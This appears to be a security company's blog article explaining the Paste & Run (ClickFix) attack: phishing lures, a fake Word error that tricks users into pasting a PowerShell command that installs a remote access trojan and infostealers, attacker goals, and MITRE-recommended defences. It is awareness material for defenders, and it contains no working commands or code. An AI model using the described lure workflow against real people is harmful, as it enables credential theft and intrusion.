Paste & Run: Executing malicious commands on corporate computers

The Paste & Run technique combines social engineering and malware to infect professionals’ computers and gain access to the information they store

Throughout 2025, a malicious technique has emerged that is causing companies major headaches: Paste & Run, also popularly known as the ClickFix technique.

Such is its significance that in March, Paste & Run was added to the MITRE ATT&CK catalog of techniques used by malicious actors, a global benchmark for the techniques, tactics, and procedures (TTPs) used by cyber attackers.

Below, we explain what the Paste & Run technique consists of, the objectives of the malicious actors who use it, and what companies and professionals can do to protect corporate computers and prevent serious damage.

1. The Paste & Run technique allows criminals to infect their victims’ computers with malware

The best way to understand how the Paste & Run technique works is to break down its phases:

1. Malicious actors conduct research on their victims. To what end? To make the deception credible. In this malicious intelligence work, hostile actors are aided by AI and the wealth of information available online about a company and its professionals.
2. A phishing campaign is created, also using AI to impersonate a company, handle the email’s visual appearance, and refine its content.
3. The email’s content usually revolves around real business issues. For example, it may refer to rates, operating instructions, or the need to update a program to get the victim to click an HTML file attached to the email.
4. When the victim does so, a pop-up window simulates a Microsoft Word message stating that the document cannot be opened due to a problem. To solve this, the victim must click a button (which copies a command without the victim being aware of it) and follow the instructions, which are usually to type Win+R to open the Windows console, Ctrl+V to paste the command, and Enter to execute it.
5. This executes a malicious PowerShell command that allows a remote access trojan (RAT) to be downloaded and executed from a remote command-and-control server, without the user being able to detect suspicious activity on their computer.
6. Thanks to this RAT, criminals can persist on the attacked computers and infect their victims’ devices with an infostealer capable of collecting access credentials to business software, session cookies, information stored in documents, etc. Cybersecurity experts have detected the use of sadly popular infostealers such as Lumma Stealer or Vidar linked to the Paste & Run technique.

2. The use of Paste & Run has been on the rise over the last year

Since the beginning of 2025, several attack campaigns have been detected that have used the Paste & Run technique to infect computers, such as the one carried out by Mocha Manakin. Thanks to a backdoor, cybercriminals have been able to implement advanced persistence mechanisms and maintain a long-term connection between the attacked device and the malicious command-and-control server.

Another notable case is that of Havoc, a command-and-control framework that allows attackers to take control of infected devices and has spread via the Paste & Run technique to target Microsoft SharePoint accounts, a key solution used by hundreds of thousands of companies.

3. Why Paste & Run can be successful: The victims’ lack of knowledge is key

Paste & Run is part of a family of techniques in which the user themselves infects their device by executing a malicious link, document, image, or command, as in this case.

While most professionals are aware that they should not click on suspicious websites or download programs, documents, or images from unverified sources, there is widespread ignorance about the dangers of command execution.

In fact, most company employees have basic computer skills and are unaware of what they are doing when they execute commands issued by hostile actors.

It is also important to note that the Paste & Run technique allows attackers to bypass the security controls of email managers and browsers that block or warn about potentially harmful files, preventing them from being downloaded.

4. Espionage, access to critical software, data theft… What are the objectives of attackers who use Paste & Run?

It is important to understand that the Paste & Run technique is only a vehicle for malicious actors to achieve their objectives. By installing infostealers and ensuring maximum persistence on the attacked computers, criminals can collect:

• Information about professionals’ and companies’ online accounts and payment methods, if the computer user has access to this data.
• Credentials to access corporate applications such as e-commerce, billing programs, logistics software, etc.
• Session cookies that allow them to bypass an increasingly common security mechanism, such as two-factor authentication.
• The history of the web browsers used by the user.

In addition, some infostealers are capable of:

• Taking screenshots of infected computers can be extremely helpful in obtaining sensitive data.
• Obtaining documents and other types of files found on a successfully attacked computer.

As a result, the Paste & Run technique can be extremely helpful to malicious actors who want to spy on companies or executives. For what purpose?

• To commit financial fraud.
• To steal business secrets and industrial property.
• To trade in economic, commercial, or customer data.
• Using stolen personal data to carry out scams against customers, employees, or suppliers.
• Carrying out covert actions in corporate programs with the aim of sabotaging the company’s operations. For example, altering its billing, modifying order management, or subverting sales.

5. How to combat attacks that use the Paste & Run technique

MITRE ATT&CK recommends three ways to mitigate the use of the Paste & Run technique against professionals and companies:

1. Prevent the execution of malicious PowerShell commands, for example, by restricting access to dangerous language elements that can be used to “execute arbitrary Windows APIs or files.”
2. Prevent network intrusions by analyzing and removing malicious downloads and blocking the activity of hostile actors.
3. Restrict web-based content so that unknown files that should not be downloaded, as well as files from suspicious sites, can be blocked.

Beyond these recommendations that can be implemented by professionals in charge of corporate cybersecurity, it is also important to have cybersecurity services that prevent the Paste & Run technique from succeeding or detect the presence of malicious activity on corporate computers:

• Social engineering test. For the Paste & Run technique to work, victims must decide to copy and execute the malicious commands. Therefore, the best way to prevent attacks based on this technique is to train professionals on how this technique works and how they should respond. Social engineering tests consist of simulated campaigns that allow companies to assess their staff’s resilience to this type of attack and to train professionals in a practical way.
• Security audits and continuous monitoring of the technological infrastructure. The use of automated tools to perform security tests and detect suspicious traffic and activity within the corporate infrastructure is essential to business security. No less vital is the intervention of cybersecurity experts who can analyze data generated by automated solutions to rule out false positives and uncover more sophisticated malicious activity that can circumvent the tools’ detection mechanisms.

6. Conclusions

In short, the Paste & Run technique shows, once again, that malicious actors are constantly innovating to develop techniques, tactics, and procedures that allow them to achieve their objectives.

Therefore, companies cannot ignore the fact that the threat landscape is becoming increasingly complex and dangerous.

Investing in cybersecurity and raising awareness across all organizations is not an option but a strategic measure to safeguard a company’s critical assets and operations.

An action as seemingly trivial as ignoring a pop-up window can lead to financial losses, reputational damage, and legal problems for an organization.

That is why preventing the use of the Paste & Run technique against a company’s professionals, or detecting an ongoing attack early, is essential.